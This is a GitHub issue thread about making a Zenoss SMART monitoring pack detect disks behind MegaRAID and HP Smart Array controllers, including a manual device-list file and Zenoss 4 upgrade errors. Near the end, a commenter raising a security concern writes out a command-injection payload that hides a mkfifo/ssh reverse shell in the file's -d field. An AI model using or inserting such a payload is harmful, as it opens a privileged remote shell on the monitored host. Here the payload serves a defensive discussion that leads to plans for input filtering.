Support indexed devices behind RAID controller
Closed this issue · 25 comments
Need to model driver & index from smartctl --scan so that the --device parameter can be passed during performance stat collection, for example /dev/bus/0 -d megaraid,8.
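A minimal sketch of what "model driver & index" could look like, assuming smartctl --scan prints lines of the form "<path> -d <type>[,<index>] # comment". This is standalone Python 3 for illustration, not the pack's code; ScanEntry, parse_scan_line and device_args are hypothetical names.

```python
import re
from typing import NamedTuple, Optional


class ScanEntry(NamedTuple):
    """One device reported by `smartctl --scan` (hypothetical container)."""
    path: str             # e.g. /dev/bus/0
    dev_type: str         # raw -d argument, e.g. megaraid,8
    driver: str           # part before the first comma, e.g. megaraid
    index: Optional[int]  # numeric index after the comma, if any


# Assumed line shape: "<path> -d <type> # free-form comment"
_SCAN_RE = re.compile(r"^(?P<path>/\S+)\s+-d\s+(?P<dev_type>[^\s#]+)")


def parse_scan_line(line: str) -> Optional[ScanEntry]:
    """Parse one scan line; return None if it does not match the assumed shape."""
    match = _SCAN_RE.match(line.strip())
    if match is None:
        return None
    dev_type = match.group("dev_type")
    driver, _, index = dev_type.partition(",")
    return ScanEntry(
        path=match.group("path"),
        dev_type=dev_type,
        driver=driver,
        index=int(index) if index.isdigit() else None,
    )


def device_args(entry: ScanEntry) -> list:
    """Arguments to append to a smartctl call for this device."""
    return [entry.path, "-d", entry.dev_type]
```

Keeping the raw dev_type alongside the split driver and index means the collection command can be rebuilt exactly as scanned, while the index remains available for a component ID that does not depend on the serial number.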
May need new system for component ID, and don't really want to use serial number.
I've seen HPSAs requiring weirdness like smartctl /dev/sda -d cciss,1 to query sda, but then querying sdb can still work by accessing sda using smartctl /dev/sda -d cciss,1 or the like.
This would be a grand feature for the pack as those things, their Dell counterparts, and other rebranded LSI & friends' kit using silly distributor firmware are all too common.
Were they showing up before?
Can you post the smartctl --scan output from that host?
This is now working, at least for megaraid. Checking HPSAs shortly (all of the ones I have right now are in HBA mode instead of LUN-per-disk like the older stuff).
HPSA isn't so great. You can get to it via:
smartctl -iAH /dev/sda -d cciss,1
smartctl 7.2 2020-12-30 r5155 [x86_64-linux-5.10.75] (local build)
Copyright (C) 2002-20, Bruce Allen, Christian Franke, www.smartmontools.org
=== START OF INFORMATION SECTION ===
Model Family: Western Digital Red
Device Model: WDC WD30EFRX-68EUZN0
Serial Number: WD-WCC4NXXXXXXX
LU WWN Device Id: 5 0014ee 20d1a13eb
Firmware Version: 82.00A82
User Capacity: 3,000,592,982,016 bytes [3.00 TB]
Sector Sizes: 512 bytes logical, 4096 bytes physical
Rotation Rate: 5400 rpm
Device is: In smartctl database [for details use: -P show]
ATA Version is: ACS-2 (minor revision not indicated)
SATA Version is: SATA 3.0, 6.0 Gb/s (current: 6.0 Gb/s)
Local Time is: Mon Nov 15 00:44:53 2021 UTC
SMART support is: Available - device has SMART capability.
SMART support is: Enabled
=== START OF READ SMART DATA SECTION ===
SMART Status not supported: Incomplete response, ATA output registers missing
SMART overall-health self-assessment test result: PASSED
Warning: This result is based on an Attribute check.
SMART Attributes Data Structure revision number: 16
Vendor Specific SMART Attributes with Thresholds:
ID# ATTRIBUTE_NAME          FLAG     VALUE WORST THRESH TYPE      UPDATED  WHEN_FAILED RAW_VALUE
  1 Raw_Read_Error_Rate     0x002f   200   200   051    Pre-fail  Always       -       0
  3 Spin_Up_Time            0x0027   182   182   021    Pre-fail  Always       -       5883
  4 Start_Stop_Count        0x0032   100   100   000    Old_age   Always       -       52
  5 Reallocated_Sector_Ct   0x0033   200   200   140    Pre-fail  Always       -       0
  7 Seek_Error_Rate         0x002e   200   200   000    Old_age   Always       -       0
  9 Power_On_Hours          0x0032   068   068   000    Old_age   Always       -       23724
 10 Spin_Retry_Count        0x0032   100   253   000    Old_age   Always       -       0
 11 Calibration_Retry_Count 0x0032   100   253   000    Old_age   Always       -       0
 12 Power_Cycle_Count       0x0032   100   100   000    Old_age   Always       -       52
192 Power-Off_Retract_Count 0x0032   200   200   000    Old_age   Always       -       46
193 Load_Cycle_Count        0x0032   191   191   000    Old_age   Always       -       29382
194 Temperature_Celsius     0x0022   113   102   000    Old_age   Always       -       37
196 Reallocated_Event_Count 0x0032   200   200   000    Old_age   Always       -       0
197 Current_Pending_Sector  0x0032   200   200   000    Old_age   Always       -       0
198 Offline_Uncorrectable   0x0030   100   253   000    Old_age   Offline      -       0
199 UDMA_CRC_Error_Count    0x0032   200   200   000    Old_age   Always       -       0
200 Multi_Zone_Error_Rate   0x0008   100   253   000    Old_age   Offline      -       0
There's no /dev/bus/0, and --scan only shows sdg, which is SATA-connected :(. Fun story with these is that /dev/sda -d cciss,1 and 2 and 3 and so on give you different disks, so the interface is /dev/sda but the number at the end is the drive being interrogated.
Dell uses megaraid i guess, so that works (older r410s tested)
If --scan doesn't show them, I'm a little unsure how to discover them. What would you think of a text file in the home dir of the Zenoss utility account on the target host with things like "/dev/sda -d cciss,1" for manual entries to model?
The text file idea is neat, but you might run into nonsense with how the new dockerized zenoss handles state. It also decapsulates the intrinsic data storage paradigm of the stack as IIRC only the Zenoss application uses local files (configs) whereas the application logic itself uses the DB.
Need to ponder on this one, kind of a pickle - lots of HPSAs out there.
I meant a file on the remote host, to be read after the smartctl scan. Not suggesting we start modifying the Zenoss collection container images :)
382fa8d will look for a zenoss_smart.txt file in the home directory of whatever account Zenoss is using to SSH on the target machine.
For example:
/dev/sda -d cciss,1
/dev/sda -d cciss,2
/dev/sda -d cciss,3
and the modeler should pick it up.
Thank you sir - using
i=0; for e in a b c d e f; do echo "sd$e -d cciss,$i"; i=$((i+1)); done > ~/zenoss_smart.txt
on the target host to test.
So @ 5b14dfc, with that file created, I am unfortunately not seeing drives appear in the SMART component after a full Zenoss restart post-update. It does still pick up the one device that is SATA-connected and not on the HPSA (nor in the ~/zenoss_smart.txt file), in case that matters.
Ah! I see what I did wrong there - it needed to be
i=0; for e in a b c d e f; do echo "/dev/sd$e -d cciss,$i"; i=$((i+1)); done > zenoss_smart.txt
... it can't presume /dev/ as the path, so each entry needs a full path from the root mount.
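To illustrate why the first attempt produced no components, here is a rough sketch of how manual entries might be read, assuming one "<absolute path> -d <type>" entry per line. It is standalone Python 3 and not the pack's actual parser; read_manual_entries is a hypothetical name, and the rule of silently skipping malformed lines is an assumption.

```python
def read_manual_entries(text):
    """Return (device_path, device_type) pairs from zenoss_smart.txt-style text.

    Lines that are not exactly "<path> -d <type>", or whose path does not
    start with /dev/, are skipped (assumed behavior for this sketch).
    """
    entries = []
    for raw in text.splitlines():
        parts = raw.split()
        if len(parts) != 3 or parts[1] != "-d":
            continue  # blank line or unexpected shape
        path, _, dev_type = parts
        if not path.startswith("/dev/"):
            continue  # "sda -d cciss,0" lands here: no full path
        entries.append((path, dev_type))
    return entries
```

With this rule, an entry such as "sda -d cciss,0" is dropped while "/dev/sda -d cciss,0" is kept, which matches the behavior seen in the thread.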
Works as described - thank you.
Excellent. I'll update the Readme shortly.
As for the columns, could you make a table showing what you have in mind? I want to make sure I'm following you correctly.
For consistency's sake, how are you thinking these cases should look?
- /dev/sda -d cciss,X
- /dev/bus/0 -d megaraid,X (with matching /dev/sdX)
- /dev/bus/0 -d megaraid,X (without matching sdX)
- /dev/sdg -d auto
Thanks!
Sorry, didn't mean to confuse the issue: the screenshot above includes a SATA disk at the bottom and CCISS disks at the top. The suggestion was to have the top disks look like the bottom one in the generic view, at least such that the device column is .split('/')[-1]
Just a heads up - Zenoss 6 doesn't seem to need this, but v4 does apparently require we remove and replace the zenpack at this point. It might be the older construction kit though:
[zenoss@zen01 ZenPacks.daviswr.SMART]$ fil /var/spool/mail/zenoss
-bash: fil: command not found
[zenoss@zen01 ZenPacks.daviswr.SMART]$ file /var/spool/mail/zenoss
/var/spool/mail/zenoss: ASCII mail text, with very long lines
[zenoss@zen01 ZenPacks.daviswr.SMART]$ tail /var/spool/mail/zenoss
  File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/BasicDefinition.py", line 1, in <module>
    from Products.ZenModel.migrate.Migrate import Version
  File "/opt/zenoss/Products/ZenModel/migrate/__init__.py", line 28, in <module>
    __import__(module[:-3], locals(), globals())
  File "/opt/zenoss/Products/ZenModel/migrate/fixEmailNotificationClearSubjectFormat.py", line 18, in <module>
    from Products.ZenModel.migrate import Migrate
ImportError: cannot import name Migrate
...
This might be a bit more messy than expected. Looks like on zenoss4 there's some constructionkit issue:
ERROR:zen.ZenossStartup:Error encountered while processing ZenPacks.community.ConstructionKit
Traceback (most recent call last):
  File "/opt/zenoss/Products/ZenossStartup/__init__.py", line 27, in <module>
    pkg_path = zpkg.load().__path__[0]
  File "/opt/zenoss/lib/python/pkg_resources.py", line 1954, in load
    entry = __import__(self.module_name, globals(),globals(), ['__name__'])
  File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/__init__.py", line 3, in <module>
    from ZenPacks.community.ConstructionKit.Construct import *
  File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/Construct.py", line 7, in <module>
    from ZenPacks.community.ConstructionKit.BasicDefinition import *
  File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/BasicDefinition.py", line 1, in <module>
    from Products.ZenModel.migrate.Migrate import Version
  File "/opt/zenoss/Products/ZenModel/migrate/__init__.py", line 28, in <module>
    __import__(module[:-3], locals(), globals())
  File "/opt/zenoss/Products/ZenModel/migrate/standalone_datapoint_rename.py", line 19, in <module>
    os.rename(fullpath, os.path.join(d, '%s_%s.rrd' % (base, base)))
OSError: [Errno 2] No such file or directory
... and that's just the --remove call. Might be in for some pain here.
None of my packs use ConstructionKit, they're all built on ZenPackLib.
Ha, well, this instance is ~5yo and has ~100 packs in it. It's all on ZFS anyway and I take zenbatchdumps so I can restore snaps or the whole thing. It's slated for replacement in Q1 anyway with a v6 somewhere up in Bezos' stack. Unwinding zope-isms is bad enough, not sure how far down this specific rabbit hole I want to fall in terms of RCA if I can recover state (though the quality of said state is definitely in question now).
Just in case it's causing a problem, though, add this back to the yaml after classes->SmartStorage->properties->SmartSupport:
      # smartctl --get=all
      AamFeature:
        label: Automatic Acoustic Management
        short_label: AAM
        default: Unavailable
        details_display: false
        order: 29
      ApmFeature:
        label: Advanced Power Management
        short_label: APM
        default: Unavailable
        details_display: false
        order: 30
      RdLookAhead:
        label: Read Look-Ahead
        default: Unavailable
        details_display: false
        order: 31
      WriteCache:
        label: Write Cache
        default: Unavailable
        details_display: false
        order: 32
      AtaSecurity:
        label: ATA Security
        short_label: Security
        default: Unavailable
        details_display: false
        order: 33
Though I've never had a problem removing a pack when the yaml lacked attributes it was installed with, aside from leaving shit on objects that doesn't need to be there. Renaming attributes, though, is a whole other can of worms.
Renaming has bitten me so many times that I'm pretty sure I produce anti-venom at this point - been using Zenoss for >10y. :) It's why we have an SOP for cron jobs to do zen dumps - external state in a flat file is safer than the catacombs of Arkham asylum otherwise known as zodb/zope.
This seems to be working properly now - still seeing the -d cciss,X suffix in the name column, but functionally works just as advertised.
Would be remiss if I didn't ask - does the zenpack filter what's in these files in any way (drop |, &&, backticks, and so on)? I could see something like dirtycow happening years down the line permitting people to execute privileged commands by overwriting this file - it's niche, but might hurt given the privs required to run smartctl and how few people use granular sudo configs (or straight-up root login for privileged functions).
EDIT - as an example, content such as this could create "a problem":
/dev/sda -d `mkfifo /tmp/kwpsul;ssh -qq -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no 255.255.255.255 0</tmp/kwpsul|/bin/sh >/tmp/kwpsul 2>&1;rm /tmp/kwpsul`
which has a lot of special characters and fun "filterables" but is just one of many publicly available similar payloads (well, in this case it's a generator I wrote into MSF).
I can drop the -d param from the title if it also contains cciss. Right now only "auto" is dropped and all indexed ones have the full name.
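A small sketch of the titling rule described here, assuming the title is built from the last path segment plus the -d argument. component_title and its drop_types parameter are hypothetical names for illustration, not the pack's code.

```python
def component_title(path, dev_type, drop_types=("auto",)):
    """Build a display title from a device path and its -d argument.

    The -d suffix is omitted when the driver (the part of dev_type before
    the first comma) is listed in drop_types.
    """
    name = path.split("/")[-1]
    driver = dev_type.split(",")[0]
    if driver in drop_types:
        return name
    return "{0} -d {1}".format(name, dev_type)
```

With the default drop_types only "auto" is dropped, so /dev/sda with cciss,1 stays "sda -d cciss,1". Passing drop_types=("auto", "cciss") gives plain "sda", which would be identical for every drive addressed through /dev/sda on an HPSA.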
As for filtering file contents: right now, no, but I think a quick grep -v with some common characters that likely won't ever be in a smartctl device name should provide some measure. I'll open an issue to track that.
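As an alternative to the grep -v denylist mentioned above, here is a sketch of an allowlist check: an entry is accepted only if the whole line matches a narrow pattern. This is a different technique from the one proposed in the thread, not the pack's implementation. is_safe_entry and the exact character classes are assumptions, and the pattern is deliberately strict, so it may reject some legitimate device paths or types.

```python
import re

# Assumed shape: "/dev/<path> -d <type>[,<arg>...]"
# Only letters, digits, underscore, slash and hyphen are allowed in the path;
# the type may also contain "+" and comma-separated arguments.
_ENTRY_RE = re.compile(
    r"/dev/[A-Za-z0-9_/-]+ -d [A-Za-z0-9_+]+(?:,[A-Za-z0-9/]+)*"
)


def is_safe_entry(line):
    """Return True only if the entire line matches the allowlist pattern."""
    return _ENTRY_RE.fullmatch(line.strip()) is not None
```

Because fullmatch must consume the entire line, anything containing |, &&, ;, backticks, $ or redirections is rejected without having to enumerate those characters.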